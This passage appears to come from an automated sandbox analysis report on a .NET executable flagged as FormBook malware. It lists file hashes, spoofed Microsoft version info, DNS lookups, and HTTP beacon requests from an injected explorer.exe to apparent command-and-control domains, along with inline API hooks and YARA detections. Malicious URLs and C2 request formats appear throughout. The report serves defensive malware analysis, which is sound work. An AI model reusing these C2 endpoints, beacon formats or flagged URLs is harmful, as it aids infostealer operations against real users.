                                    https://smartdevappoffic.azurewebsites.net/qeBM8A4A6/WuZ2Y/FAjZdg5Nrw/@t1~RGCy/wefxc.php?bbre=d6266420d5a57cc3d73bcb5a9ec80cdeGet hashmaliciousBrowse
                                    • 52.200.37.44
                                    bossson2.exeGet hashmaliciousBrowse
                                    • 54.225.153.147
                                    https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000Get hashmaliciousBrowse
                                    • 100.25.209.179
                                    REQUEST FOR QUOTATION-6container.exeGet hashmaliciousBrowse
                                    • 54.243.161.145
                                    https://app.box.com/s/mk1t9s05ty9ba7rvsdbstgc46rb4fod7Get hashmaliciousBrowse
                                    • 54.197.143.221
                                    https://go.pardot.com/e/395202/siness-insights-dashboard-html/bnmpz6/1446733421?h=AwLDfNsCVbkjEN13pzY-7AXMPolL_XMigGsJSppGaiMGet hashmaliciousBrowse
                                    • 18.232.28.189
                                    https://app.box.com/s/gdf36roak3w2fc52cgfbxuq651p0zehyGet hashmaliciousBrowse
                                    • 54.197.143.221

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\86dXpRWnFG.exe.log
                                    Process:C:\Users\user\Desktop\86dXpRWnFG.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1119
                                    Entropy (8bit):5.356708753875314
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                    MD5:3197B1D4714B56F2A6AC9E83761739AE
                                    SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                    SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                    SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):4.317508777163088
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:86dXpRWnFG.exe
                                    File size:962560
                                    MD5:221e46c09eb3440beb5a2256211c3262
                                    SHA1:0f056342e6dffb5c4f3cdd1d7bd4ac5427175be0
                                    SHA256:6ca1b2240b6d547ada7051dc4d0c198517436943ffd7a4d1eebc0bca19ac038a
                                    SHA512:48e479701738109d705f620f40e1d264bd22dacb78de6b8c64f693ae09ed1c02a61c93f751c4d1710ecc4539493d2a2308ec0b86147d8e49b799e7d7fd28073b
                                    SSDEEP:12288:wG0EuC4WRkmWF4fX8Lp1H24SYYSY+hbsBIZG1Xc:e04W62RSPsyZF
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.._.............................L... ...`....@.. ....................................@................................

                                    File Icon

                                    Icon Hash:684982a2a2a28236

                                    Static PE Info

                                    General

                                    Entrypoint:0x4c4cee
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x5FB6DB47 [Thu Nov 19 20:53:27 2020 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc4ca00x4b.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x27db4.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xee0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xc2cf40xc2e00False0.404351998477data3.99403510178IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0xc60000x27db40x27e00False0.0947847276646data2.40140811766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xee0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0xc61300x26c08data
                                    RT_GROUP_ICON0xecd380x14data
                                    RT_VERSION0xecd4c0x410data
                                    RT_MANIFEST0xed15c0xc55XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyright Microsoft Corporation. All rights reserved.
                                    Assembly Version6.1.7601.17514
                                    InternalNameVfgwhtwrcepk2.exe
                                    FileVersion6.1.7601.17514
                                    CompanyNameMicrosoft Corporation
                                    CommentsWindows Desktop Gadgets
                                    ProductNameMicrosoft Windows Operating System
                                    ProductVersion6.1.7601.17514
                                    FileDescriptionWindows Desktop Gadgets
                                    OriginalFilenameVfgwhtwrcepk2.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    11/20/20-08:44:04.514127TCP1201ATTACK-RESPONSES 403 Forbidden804976734.102.136.180192.168.2.4

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 20, 2020 08:44:04.370511055 CET4976780192.168.2.434.102.136.180
                                    Nov 20, 2020 08:44:04.387168884 CET804976734.102.136.180192.168.2.4
                                    Nov 20, 2020 08:44:04.389692068 CET4976780192.168.2.434.102.136.180
                                    Nov 20, 2020 08:44:04.389849901 CET4976780192.168.2.434.102.136.180
                                    Nov 20, 2020 08:44:04.406249046 CET804976734.102.136.180192.168.2.4
                                    Nov 20, 2020 08:44:04.514127016 CET804976734.102.136.180192.168.2.4
                                    Nov 20, 2020 08:44:04.514169931 CET804976734.102.136.180192.168.2.4
                                    Nov 20, 2020 08:44:04.514471054 CET4976780192.168.2.434.102.136.180
                                    Nov 20, 2020 08:44:04.514564991 CET4976780192.168.2.434.102.136.180
                                    Nov 20, 2020 08:44:04.531097889 CET804976734.102.136.180192.168.2.4
                                    Nov 20, 2020 08:44:24.864048958 CET4976880192.168.2.452.0.217.44
                                    Nov 20, 2020 08:44:24.966701031 CET804976852.0.217.44192.168.2.4
                                    Nov 20, 2020 08:44:24.966809988 CET4976880192.168.2.452.0.217.44
                                    Nov 20, 2020 08:44:24.966959000 CET4976880192.168.2.452.0.217.44
                                    Nov 20, 2020 08:44:25.069392920 CET804976852.0.217.44192.168.2.4
                                    Nov 20, 2020 08:44:25.069421053 CET804976852.0.217.44192.168.2.4
                                    Nov 20, 2020 08:44:25.069430113 CET804976852.0.217.44192.168.2.4
                                    Nov 20, 2020 08:44:25.069735050 CET4976880192.168.2.452.0.217.44
                                    Nov 20, 2020 08:44:25.069809914 CET4976880192.168.2.452.0.217.44
                                    Nov 20, 2020 08:44:25.172363997 CET804976852.0.217.44192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 20, 2020 08:42:16.947756052 CET5585453192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:16.974852085 CET53558548.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:17.926908016 CET6454953192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:17.954118013 CET53645498.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:19.072123051 CET6315353192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:19.099153996 CET53631538.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:20.021580935 CET5299153192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:20.057055950 CET53529918.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:21.183758020 CET5370053192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:21.210932970 CET53537008.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:22.243117094 CET5172653192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:22.270226002 CET53517268.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:23.413438082 CET5679453192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:23.440790892 CET53567948.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:24.578059912 CET5653453192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:24.605242014 CET53565348.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:26.284632921 CET5662753192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:26.313071966 CET53566278.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:34.399322033 CET5662153192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:34.426629066 CET53566218.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:35.969789028 CET6311653192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:35.996882915 CET53631168.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:36.999999046 CET6407853192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:37.043915033 CET53640788.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:40.765012026 CET6480153192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:40.792388916 CET53648018.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:42.514817953 CET6172153192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:42.541929007 CET53617218.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:55.032563925 CET5125553192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:55.072527885 CET53512558.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:55.595218897 CET6152253192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:55.660583973 CET53615228.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:56.156481981 CET5233753192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:56.192096949 CET53523378.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:56.720575094 CET5504653192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:56.774022102 CET53550468.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:56.920583010 CET4961253192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:56.956103086 CET53496128.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:57.267293930 CET4928553192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:57.302789927 CET53492858.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:57.656210899 CET5060153192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:57.691886902 CET53506018.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:58.248058081 CET6087553192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:58.283742905 CET53608758.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:58.841361046 CET5644853192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:58.876811028 CET53564488.8.8.8192.168.2.4
                                    Nov 20, 2020 08:42:59.653564930 CET5917253192.168.2.48.8.8.8
                                    Nov 20, 2020 08:42:59.689203024 CET53591728.8.8.8192.168.2.4
                                    Nov 20, 2020 08:43:00.405847073 CET6242053192.168.2.48.8.8.8
                                    Nov 20, 2020 08:43:00.441771030 CET53624208.8.8.8192.168.2.4
                                    Nov 20, 2020 08:43:05.868619919 CET6057953192.168.2.48.8.8.8
                                    Nov 20, 2020 08:43:05.906162024 CET53605798.8.8.8192.168.2.4
                                    Nov 20, 2020 08:43:15.031177044 CET5018353192.168.2.48.8.8.8
                                    Nov 20, 2020 08:43:15.058324099 CET53501838.8.8.8192.168.2.4
                                    Nov 20, 2020 08:43:15.325855017 CET6153153192.168.2.48.8.8.8
                                    Nov 20, 2020 08:43:15.361447096 CET53615318.8.8.8192.168.2.4
                                    Nov 20, 2020 08:43:20.819029093 CET4922853192.168.2.48.8.8.8
                                    Nov 20, 2020 08:43:20.855814934 CET53492288.8.8.8192.168.2.4
                                    Nov 20, 2020 08:43:49.834976912 CET5979453192.168.2.48.8.8.8
                                    Nov 20, 2020 08:43:49.862088919 CET53597948.8.8.8192.168.2.4
                                    Nov 20, 2020 08:43:51.183955908 CET5591653192.168.2.48.8.8.8
                                    Nov 20, 2020 08:43:51.211226940 CET53559168.8.8.8192.168.2.4
                                    Nov 20, 2020 08:44:04.324537992 CET5275253192.168.2.48.8.8.8
                                    Nov 20, 2020 08:44:04.364351034 CET53527528.8.8.8192.168.2.4
                                    Nov 20, 2020 08:44:24.729914904 CET6054253192.168.2.48.8.8.8
                                    Nov 20, 2020 08:44:24.862246990 CET53605428.8.8.8192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Nov 20, 2020 08:44:04.324537992 CET192.168.2.48.8.8.80x4f3Standard query (0)www.powderedsilk.comA (IP address)IN (0x0001)
                                    Nov 20, 2020 08:44:24.729914904 CET192.168.2.48.8.8.80xe12aStandard query (0)www.voetbalvandaag.netA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Nov 20, 2020 08:44:04.364351034 CET8.8.8.8192.168.2.40x4f3No error (0)www.powderedsilk.compowderedsilk.comCNAME (Canonical name)IN (0x0001)
                                    Nov 20, 2020 08:44:04.364351034 CET8.8.8.8192.168.2.40x4f3No error (0)powderedsilk.com34.102.136.180A (IP address)IN (0x0001)
                                    Nov 20, 2020 08:44:24.862246990 CET8.8.8.8192.168.2.40xe12aNo error (0)www.voetbalvandaag.net52.0.217.44A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.powderedsilk.com
                                    • www.voetbalvandaag.net

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.44976734.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Nov 20, 2020 08:44:04.389849901 CET4792OUTGET /ogg/?FdtP=yL0l42d8z4u&JfspOLvH=fOCM8bU6nldV/iwSncfaF5Bzy/lGPGgo/g5DGIZRlu3EMk3UROnm6TGL4YPAlMSLjacD HTTP/1.1
                                    Host: www.powderedsilk.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Nov 20, 2020 08:44:04.514127016 CET4792INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Fri, 20 Nov 2020 07:44:04 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "5fb6e13a-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.44976852.0.217.4480C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Nov 20, 2020 08:44:24.966959000 CET4795OUTGET /ogg/?JfspOLvH=+OCwvSqshndtikU4mojjB9YFTo9N+xlFipQY5pDaON76D3kf/3J7hGXS0Ci6kD/8+653&FdtP=yL0l42d8z4u HTTP/1.1
                                    Host: www.voetbalvandaag.net
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Nov 20, 2020 08:44:25.069421053 CET4796INHTTP/1.1 200 OK
                                    Date: Fri, 20 Nov 2020 7:44:21 GMT
                                    Connection: close
                                    Content-Length: 829
                                    X-Frame-Options: SAMEORIGIN
                                    Cache-Control: private, no-cache, no-store, max-age=0
                                    Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 26 6e 62 73 70 3b 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 2e 63 64 6e 70 61 72 6b 2e 63 6f 6d 2f 74 68 65 6d 65 73 2f 72 65 67 69 73 74 72 61 72 2f 37 39 31 31 30 35 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 21 2d 2d 0a 76 61 72 20 63 6e 61 6d 65 20 3d 20 22 37 39 31 31 30 35 22 3b 76 61 72 20 69 64 65 6e 74 69 66 69 65 72 20 3d 20 22 22 3b 0a 2d 2d 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 69 2e 63 64 6e 70 61 72 6b 2e 63 6f 6d 2f 72 65 67 69 73 74 72 61 72 2f 76 33 2f 6c 6f 61 64 65 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 68 70 5f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no shrink-to-fit=no"><title>&nbsp;</title><link href="http://i.cdnpark.com/themes/registrar/791105.css" rel="stylesheet"><link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700" rel="stylesheet" type="text/css"></head><body><script type="text/javascript">...var cname = "791105";var identifier = "";--></script><script type="text/javascript" src="//i.cdnpark.com/registrar/v3/loader.js"></script><script type="text/javascript" src="/hp_script.js"></script></body></html>


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE0
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE0
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE0
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE0

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: 86dXpRWnFG.exe PID: 204 Parent PID: 5912

                                    General

                                    Start time:08:42:21
                                    Start date:20/11/2020
                                    Path:C:\Users\user\Desktop\86dXpRWnFG.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\86dXpRWnFG.exe'
                                    Imagebase:0x220000
                                    File size:962560 bytes
                                    MD5 hash:221E46C09EB3440BEB5A2256211C3262
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
